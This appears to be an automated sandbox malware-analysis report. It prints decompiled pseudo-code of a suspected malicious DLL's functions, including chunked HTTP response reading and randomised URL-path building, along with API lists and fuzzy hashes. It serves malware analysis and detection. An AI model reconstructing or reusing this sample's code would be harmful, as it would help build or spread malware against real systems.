							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L010C8184();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E010C2EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E010C5776(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E010C4A1C(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x10ca1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                    0x010c4212
                    0x010c421e
                    0x010c4224
                    0x010c4229
                    0x010c422d
                    0x010c439f
                    0x010c43a3
                    0x010c43a3
                    0x010c4233
                    0x010c4237
                    0x010c423d
                    0x010c423e
                    0x010c4249
                    0x010c424f
                    0x010c4254
                    0x010c4257
                    0x010c4271
                    0x010c4280
                    0x010c428c
                    0x010c4296
                    0x010c429b
                    0x010c429d
                    0x010c42a0
                    0x010c4357
                    0x010c435d
                    0x010c436e
                    0x010c4381
                    0x010c4397
                    0x00000000
                    0x010c439c
                    0x010c42a9
                    0x010c42b0
                    0x010c42b4
                    0x010c42ba
                    0x010c42bc
                    0x010c42be
                    0x010c42c0
                    0x010c42c2
                    0x010c42cc
                    0x010c42d1
                    0x010c42d3
                    0x010c42d5
                    0x010c42d6
                    0x010c42d7
                    0x010c42d8
                    0x010c42df
                    0x010c42e6
                    0x010c42e9
                    0x010c42e9
                    0x010c42b6
                    0x010c42b6
                    0x010c42b6
                    0x010c42f1
                    0x010c42f9
                    0x010c4305
                    0x010c430a
                    0x010c430a
                    0x010c430f
                    0x00000000
                    0x00000000
                    0x010c4311
                    0x010c4314
                    0x010c4321
                    0x00000000
                    0x00000000
                    0x010c4323
                    0x010c4323
                    0x010c4330
                    0x010c430a
                    0x010c430f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c430f
                    0x010c433a
                    0x010c433d
                    0x010c4340
                    0x010c4347
                    0x010c4347
                    0x010c4354
                    0x00000000
                    0x010c4354
                    0x010c4240
                    0x010c4244
                    0x010c4245
                    0x010c4247
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c4247
                    0x00000000

                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 010C42C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 010C42D8
                    • memset.NTDLL ref: 010C4381
                    • memset.NTDLL ref: 010C4397
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: 4b47c98a88a25dbb84647a010110dddc1922da6529a0d9e43b5f03fd07a8a436
                    • Instruction ID: 0bd21faf00962c97ab72a5f7ca0c9ecf7278cdee0691cd11ff979d2f51b6e7c0
                    • Opcode Fuzzy Hash: 4b47c98a88a25dbb84647a010110dddc1922da6529a0d9e43b5f03fd07a8a436
                    • Instruction Fuzzy Hash: 8C41BF31A0021AABDB10DF68DC51BEE77B5FF95B10F10856DF989A7281DB70AE448F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C135F Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    C-Code - Quality: 42%
                    			E010C135F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x10ca164() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x10ca174(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E010C63FD(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x10ca164() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E010C5867( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E010C17AB(_v16);
										if(_t64 == 0) {
											_t64 = E010C16E7(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E010C5867( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E010C58EE(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                    0x010c135f
                    0x010c1360
                    0x010c1366
                    0x010c1371
                    0x010c1371
                    0x010c1373
                    0x010c2402
                    0x010c2407
                    0x010c2409
                    0x010c240e
                    0x010c240f
                    0x010c2414
                    0x010c2415
                    0x010c2420
                    0x010c2451
                    0x010c2456
                    0x010c2519
                    0x010c245c
                    0x010c2463
                    0x010c246b
                    0x010c2516
                    0x010c2471
                    0x010c2476
                    0x010c247d
                    0x010c2480
                    0x010c2508
                    0x010c2486
                    0x010c2486
                    0x010c2488
                    0x010c248e
                    0x010c248f
                    0x010c248f
                    0x010c2492
                    0x010c2495
                    0x010c249b
                    0x010c24a0
                    0x010c24a1
                    0x010c24a6
                    0x010c24a9
                    0x010c24b4
                    0x00000000
                    0x00000000
                    0x010c24bc
                    0x010c24c4
                    0x010c24d0
                    0x010c24d4
                    0x010c24d6
                    0x010c24db
                    0x00000000
                    0x00000000
                    0x010c24db
                    0x010c24d4
                    0x010c24ed
                    0x010c24f0
                    0x010c24f7
                    0x010c2502
                    0x010c2502
                    0x00000000
                    0x010c24dd
                    0x010c24dd
                    0x010c24e2
                    0x010c24e4
                    0x010c24e5
                    0x010c24e8
                    0x00000000
                    0x010c24e8
                    0x00000000
                    0x010c24e2
                    0x010c248f
                    0x010c2509
                    0x010c2509
                    0x010c250f
                    0x010c250f
                    0x010c246b
                    0x010c2422
                    0x010c2428
                    0x010c2430
                    0x010c2449
                    0x010c244b
                    0x00000000
                    0x00000000
                    0x010c2432
                    0x010c243c
                    0x010c2440
                    0x010c2446
                    0x00000000
                    0x010c2446
                    0x010c2440
                    0x010c2430
                    0x010c2522
                    0x010c1368
                    0x010c1368
                    0x010c136f
                    0x010c137a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c136f

                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 010C2409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 010C2422
                    • ResetEvent.KERNEL32(?), ref: 010C249B
                    • GetLastError.KERNEL32 ref: 010C24B6
                      • Part of subcall function 010C58EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 010C5905
                      • Part of subcall function 010C58EE: SetEvent.KERNEL32(?), ref: 010C5915
                      • Part of subcall function 010C58EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 010C5947
                      • Part of subcall function 010C58EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C596C
                      • Part of subcall function 010C58EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C598C
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 73409f7cb7371fcc82b85c4315d317810ebde750c033444b0b7e7b6d7d92eaee
                    • Instruction ID: 69e7ae2fb8e3b09324ac0d93e265c0fa991c2d08399b5101c1e6e93c3f4bce01
                    • Opcode Fuzzy Hash: 73409f7cb7371fcc82b85c4315d317810ebde750c033444b0b7e7b6d7d92eaee
                    • Instruction Fuzzy Hash: FD41D736600204EFDB629BA9DC40A9FB7F9AF84B60F1501ACF596D3591EB31D9418F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C3FD2 Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E010C3FD2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x10ca310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x10ca320; // 0x26dd5a8
				_t3 = _t8 + 0x10cb87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E010C32D0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x10ca34c, 1, 0, _t30);
					E010C17AB(_t30);
				}
				_t12 =  *0x10ca2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E010C2AB4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E010C196A(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x10ca118( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E010C78DB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                    0x010c3fd3
                    0x010c3fda
                    0x010c3fe4
                    0x010c3fe8
                    0x010c3fee
                    0x010c3ffd
                    0x010c4004
                    0x010c4008
                    0x010c401a
                    0x010c401c
                    0x010c401c
                    0x010c4021
                    0x010c4028
                    0x010c407d
                    0x010c407d
                    0x010c4083
                    0x010c4085
                    0x010c4085
                    0x010c408f
                    0x010c4093
                    0x010c40a5
                    0x010c40a5
                    0x010c40a9
                    0x010c40af
                    0x010c40af
                    0x00000000
                    0x010c4041
                    0x010c4046
                    0x010c404e
                    0x010c4050
                    0x010c4054
                    0x010c4054
                    0x010c4061
                    0x010c4065
                    0x010c4069
                    0x010c40be
                    0x010c40c4
                    0x010c40c4
                    0x010c4077
                    0x010c407b
                    0x010c40b2
                    0x010c40b4
                    0x010c40b7
                    0x010c40b7
                    0x00000000
                    0x010c40b4
                    0x010c407b
                    0x00000000
                    0x010c4065

                    APIs
                      • Part of subcall function 010C32D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,037A9D58,00000000,?,?,69B25F44,00000005,010CA00C,4D283A53,?,?), ref: 010C3306
                      • Part of subcall function 010C32D0: lstrcpy.KERNEL32(00000000,00000000), ref: 010C332A
                      • Part of subcall function 010C32D0: lstrcat.KERNEL32(00000000,00000000), ref: 010C3332
                    • CreateEventA.KERNEL32(010CA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,010C186F,?,?,?), ref: 010C4013
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,010C186F,00000000,00000000,?,00000000,?,010C186F,?,?,?), ref: 010C4071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,010C186F,?,?,?), ref: 010C409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,010C186F,?,?,?), ref: 010C40B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: d0dc600cb0c1b32b6af38b899a1725400d48567cfa5971fa8301191037db3145
                    • Instruction ID: e5a94ef73fb56d1fbc099333e4c7f0de85ddab804025a52f081487d4da91c1ba
                    • Opcode Fuzzy Hash: d0dc600cb0c1b32b6af38b899a1725400d48567cfa5971fa8301191037db3145
                    • Instruction Fuzzy Hash: 5C21DF326803119FD7715B6C8898AAE7AE8FF88F15F25025CFAC1DB145DB76D8018F51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C17C0 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E010C17C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E010C6710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E010C238A(_t23);
						}
					}
					return _t38;
				}
				if(E010C40C7(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x10ca34c, 1, 0,  *0x10ca3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E010C5E53(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E010C2B1E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E010C4B59(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E010C3FD2( &_v32, _t39);
					goto L13;
				}
			}












                    0x010c17c0
                    0x010c17cd
                    0x010c17d3
                    0x010c17d4
                    0x010c17d5
                    0x010c17d6
                    0x010c17d7
                    0x010c17db
                    0x010c17e7
                    0x010c17eb
                    0x010c1873
                    0x010c1873
                    0x010c1876
                    0x010c1878
                    0x010c1880
                    0x010c1886
                    0x010c1889
                    0x010c1889
                    0x010c1886
                    0x010c1894
                    0x010c1894
                    0x010c17fe
                    0x010c1800
                    0x010c1800
                    0x010c1817
                    0x010c181b
                    0x010c181e
                    0x010c1829
                    0x010c1830
                    0x010c1830
                    0x010c183c
                    0x010c183d
                    0x010c184b
                    0x010c183f
                    0x010c183f
                    0x010c1840
                    0x010c1841
                    0x010c1842
                    0x010c1843
                    0x010c1844
                    0x010c1844
                    0x010c1850
                    0x010c1855
                    0x010c1857
                    0x010c1859
                    0x010c1859
                    0x010c1860
                    0x00000000
                    0x010c1862
                    0x010c1862
                    0x010c186f
                    0x00000000
                    0x010c186f

                    APIs
                    • CreateEventA.KERNEL32(010CA34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 010C1811
                    • SetEvent.KERNEL32(00000000), ref: 010C181E
                    • Sleep.KERNEL32(00000BB8), ref: 010C1829
                    • CloseHandle.KERNEL32(00000000), ref: 010C1830
                      • Part of subcall function 010C5E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,010C1850,?,010C1850,?,?,?,?,?,010C1850,?), ref: 010C5F2D
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: 7f522a570996508cdaf37cf2e9fe1446c38ad7809cda95075eba7fea70ea401e
                    • Instruction ID: beb24a713fe7fb517b8d2aff08542a4675600fa080efe0d5f00c942686bc7337
                    • Opcode Fuzzy Hash: 7f522a570996508cdaf37cf2e9fe1446c38ad7809cda95075eba7fea70ea401e
                    • Instruction Fuzzy Hash: 4021C532E04219EFDB20AFE888849DF77B9AB04B50B10846DFA91E7141D775D9498FE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C5ACD Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E010C5ACD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x10ca2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x10ca2f0; // 0xcb191711
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x10ca2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                    0x010c5ad5
                    0x010c5ad8
                    0x010c5ade
                    0x010c5af6
                    0x010c5afa
                    0x010c5afd
                    0x010c5aff
                    0x010c5b02
                    0x010c5b04
                    0x010c5b07
                    0x010c5b09
                    0x010c5b09
                    0x010c5b0b
                    0x010c5b16
                    0x010c5b1b
                    0x010c5b2c
                    0x010c5b34
                    0x010c5b39
                    0x010c5b3c
                    0x010c5b3f
                    0x010c5b41
                    0x010c5b47
                    0x010c5b4a
                    0x010c5b4a
                    0x010c5b4a
                    0x010c5b55
                    0x010c5b5a
                    0x010c5b64

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,010C194D,00000000,?,?,010C6ABB,?,037A95B0), ref: 010C5AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 010C5AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,010C194D,00000000,?,?,010C6ABB,?,037A95B0), ref: 010C5B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 010C5B55
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: 073484738f6e7bc06dcaae00df6a098c40950ae7f531d1db75727ca4f35794f2
                    • Instruction ID: c4d98ad136197813e0e8049530439d13190a1c440b7993fc3efd69da7b1b23fc
                    • Opcode Fuzzy Hash: 073484738f6e7bc06dcaae00df6a098c40950ae7f531d1db75727ca4f35794f2
                    • Instruction Fuzzy Hash: 57110A72B00129AFC7208B69DC84D9EBFFEEB90650B1401A9F54597180F6759E04CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C6156 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C6156(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                    0x010c6160
                    0x010c6164
                    0x010c6179
                    0x010c617d
                    0x010c6180
                    0x010c6186
                    0x010c618a
                    0x010c618d
                    0x010c6198
                    0x010c618f
                    0x010c618f
                    0x010c618f
                    0x010c618d
                    0x010c61a6

                    APIs
                    • memset.NTDLL ref: 010C6164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 010C6179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 010C6186
                    • CloseHandle.KERNEL32(?), ref: 010C6198
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: e722629c7b41103b8d7b7a7967b67becf14f7ca7f9222a3fe5a5a08fe9235ba0
                    • Instruction ID: dfb9f269f8c158d8adcf353d56060438fac56dfcec63c9857f8daf6880458458
                    • Opcode Fuzzy Hash: e722629c7b41103b8d7b7a7967b67becf14f7ca7f9222a3fe5a5a08fe9235ba0
                    • Instruction Fuzzy Hash: 6CF0DAB110430CAFD2205F26DC8082BBBADFB85699B25496DB58691642DA76A8168F70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C137B Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C137B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x10ca30c; // 0x2d4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x10ca358; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x10ca30c; // 0x2d4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x10ca2d8; // 0x33b0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                    0x010c137b
                    0x010c1382
                    0x010c13cc
                    0x010c13ce
                    0x010c13ce
                    0x010c1386
                    0x010c138c
                    0x010c1391
                    0x010c1395
                    0x010c139b
                    0x010c13a2
                    0x00000000
                    0x00000000
                    0x010c13a4
                    0x010c13a9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c13a9
                    0x010c13ab
                    0x010c13b3
                    0x010c13b6
                    0x010c13b6
                    0x010c13bc
                    0x010c13c3
                    0x010c13c6
                    0x010c13c6
                    0x00000000

                    APIs
                    • SetEvent.KERNEL32(000002D4,00000001,010C10AA), ref: 010C1386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 010C1395
                    • CloseHandle.KERNEL32(000002D4), ref: 010C13B6
                    • HeapDestroy.KERNEL32(033B0000), ref: 010C13C6
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 4c3133b29741b6def42e497bb0aee97a8117fe91c0f54fac7ca0833c1c6b1da1
                    • Instruction ID: 42fca92d0a04d2b220885b0cfaab1542f8f62714e328f90501679feab61f7dc1
                    • Opcode Fuzzy Hash: 4c3133b29741b6def42e497bb0aee97a8117fe91c0f54fac7ca0833c1c6b1da1
                    • Instruction Fuzzy Hash: 15F01235B01211DFE7309B7DD85CB5A3BE8AB44B59B148554BDC0E368AEA7AC4409F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C5231 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C5231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E010C5406(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
